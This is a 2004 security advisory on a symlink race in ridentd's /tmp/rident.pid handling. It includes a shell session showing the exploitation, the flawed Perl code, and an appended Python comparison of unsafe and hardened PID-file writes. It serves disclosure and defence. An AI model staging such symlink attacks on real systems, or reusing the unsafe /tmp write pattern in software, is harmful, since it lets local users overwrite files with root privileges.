SecurityTracker.com
SecurityTracker
Archives
Category:  Application (Generic)  >  ridentd
Vendors:  Meijer, Rob J.
Random Ident Server (ridentd) Lets Local Users Overwrite Certain Files
SecurityTracker Alert ID:  1009552
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Mar 24 2004
Impact:  Modification of system information, Modification of user information
Exploit Included:  Yes  
Version(s): 0.9.1b
Description:  A vulnerability was reported in the Random Ident server (ridentd). A local user can cause certain types of files to be overwritten.

Martin reported that 'rident.pl' uses a temporary file ('/tmp/rident.pid') in an unsafe manner. The file is used to store the process ID (PID) of the ridentd process. A local user can create a symbolic link (symlink) at the temporary file's path pointing to a file on the target system. Then, when ridentd is started by root, the symlinked file will be overwritten with root privileges with the PID of ridentd.

According to the report, the linked file must contain only numerical characters for the exploit to work.

Impact:  A local user can cause arbitrary files with numerical contents to be overwritten with root privileges.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.xs4all.nl/~rmeijer/rident.html
Cause:  Access control error, State error
Underlying OS:  Linux (Any), UNIX (Any)
Reported By:  Martin <broadcast@mail.ptraced.net>
Message History:   None.


 Source Message Contents

Date:  Wed, 24 Mar 2004 11:16:38 -0300
From:  Martin <broadcast@mail.ptraced.net>
Subject:  [Full-Disclosure] rident.pl 0.9 file "deletion" and PID files modification

 


Advisory attached.
Future advisories may be found at http://broadcast.ptraced.net



rident.pl 0.9.1b file "deletion" and PID files modification.

Martin (broadcast@mail.ptraced.net)

-------------------
Program Description
-------------------

Random Ident server (ridentd)

"This server application is meant for the totally paranoid that need access
to servers that require ident and don't want to give any information
about local users to the remote server or its other users.

...

The really paranoid may wish to start ridentd a few times a day
from their cron in order to reseed both the random set of dictionary words
and the port modulo. When using in the cron it is advised to use the
'SILENT' option."

-----------------------------------
Problem Description and Exploitation
-----------------------------------

$ ./ridentd.pl 

***** Random Ident Server 0.9.0b *****
* Using file /usr/lib/ispell/britishmed+.hash
* Counting usable words
* Generating random selection of 1184 from 38642
* Generating insertion table    
* Aquiring names
* 1184 words fetched             
  (local ports belonging to each uniq modulus of 1184 get
   a dictionary word assigned to them)
Need to be root to bind to the ident port

$ ls -l /tmp

lrwxrwxrwx    1 broadcast broadcast        4 2004-03-21 20:52 rident.pid -> sexy
-rw-r--r--    1 broadcast broadcast        4 2004-03-21 20:52 sexy

$ cat sexy
123

$ su -
Password: 

# ./rident.pl

***** Random Ident Server 0.9.0b *****
* Using file /usr/lib/ispell/britishmed+.hash
* Counting usable words
* Generating random selection of 2212 from 38642
* Generating insertion table    
* Aquiring names
* 2212 words fetched             
  (local ports belonging to each uniq modulus of 2212 get
   a dictionary word assigned to them)
* PID file found
* Checking for process with pid 123
* pid file apears to be old
* Binding to port 113
* Forking to background
* BG Process active
* BG Process seting uid/gid to nobody 65534/65534
* Looking if we can do socketpair lookups : Yep: LINUX

# cat /tmp/sexy
20199 

# exit

PID Files modification. Any user could link /tmp/rident.pid to any PID 
file. In fact, any user could link it to a file that only contains 
numerical characters. 

  # $opid holds whatever was read from /tmp/rident.pid; the only check is a
  # regexp on its contents, nothing about what the path itself is (symlink,
  # owner, link count).
  unless ($opid =~ /^\d+$/)
  {
    print "HEY, SOMEONE F*CKED UP MY PIDFILE /tmp/rident.pid\n";
    exit;
  }

Potty mouth. Censored.
That's the starting point of the race, which ends in:

if ($pid)
{
  # Parent after fork: ">" truncates and follows a symlink, so the PID is
  # written through /tmp/rident.pid into whatever it points at, as root.
  open(PID,">/tmp/rident.pid");
  print PID "$pid\n";
  close(PID);
  exit;
}

Winning the race will make the daemon write the PID number of the 
process into any file.

------------------
Possible Solutions
------------------

Discontinuing use of LSD may help with the paranoia.
Add a real check when opening /tmp/rident.pid instead of a regexp.
Discontinue the use of foul language.
Add another real check when reopening /tmp/rident.pid.

----------------
Vendor Contacted
----------------

Not yet.

------------
Official Fix
------------

None yet.

-------------
Related Links
-------------

http://www.securityfocus.com/tools/1935
http://www.xs4all.nl/~rmeijer/rident.html 



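The two PID-file patterns side by side, as an added illustration that is not part of the advisory or of ridentd's code: the unsafe version mirrors the open(PID,">/tmp/rident.pid") call above, the hardened version creates the file with O_CREAT|O_EXCL|O_NOFOLLOW and verifies the descriptor, which is the "real check" the advisory asks for. Function names and the constructed rident.pid -> victim symlink scenario are hypothetical.

```python
import os
import stat
import tempfile


def write_pid_unsafe(pid_path, pid):
    """ridentd's pattern: a plain truncating open follows a symlink."""
    with open(pid_path, "w") as fh:        # writes through /tmp/rident.pid -> victim
        fh.write(f"{pid}\n")


def write_pid_safe(pid_path, pid):
    """Create the PID file atomically; never follow or reuse an existing path."""
    # O_EXCL fails if anything exists at pid_path, even a dangling symlink;
    # O_NOFOLLOW (Linux/BSD) additionally refuses to traverse a symlink.
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(pid_path, flags, 0o644)
    try:
        st = os.fstat(fd)                  # check the object we actually opened
        if (not stat.S_ISREG(st.st_mode) or st.st_nlink != 1
                or st.st_uid != os.geteuid()):
            raise OSError("PID file is not a fresh regular file we own")
        os.write(fd, f"{pid}\n".encode())
    finally:
        os.close(fd)


def demo():
    """Constructed scenario: rident.pid is a symlink to 'victim' holding '123'."""
    with tempfile.TemporaryDirectory() as tmp:
        victim = os.path.join(tmp, "victim")
        pid_path = os.path.join(tmp, "rident.pid")
        with open(victim, "w") as fh:
            fh.write("123\n")
        os.symlink(victim, pid_path)       # what the local user sets up

        write_pid_unsafe(pid_path, 20199)
        after_unsafe = open(victim).read() # victim's contents replaced by the PID

        with open(victim, "w") as fh:      # reset and try the hardened writer
            fh.write("123\n")
        try:
            write_pid_safe(pid_path, 20199)
            safe_refused = False
        except OSError:                    # FileExistsError: symlink in the way
            safe_refused = True
        after_safe = open(victim).read()
        return after_unsafe, safe_refused, after_safe
```

With O_EXCL a stale PID file from a crashed daemon must be removed explicitly (after lstat confirms it is a regular file) before the retry; keeping the PID file in a root-owned directory rather than world-writable /tmp removes the symlink opportunity altogether.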


Copyright 2004, SecurityGlobal.net LLC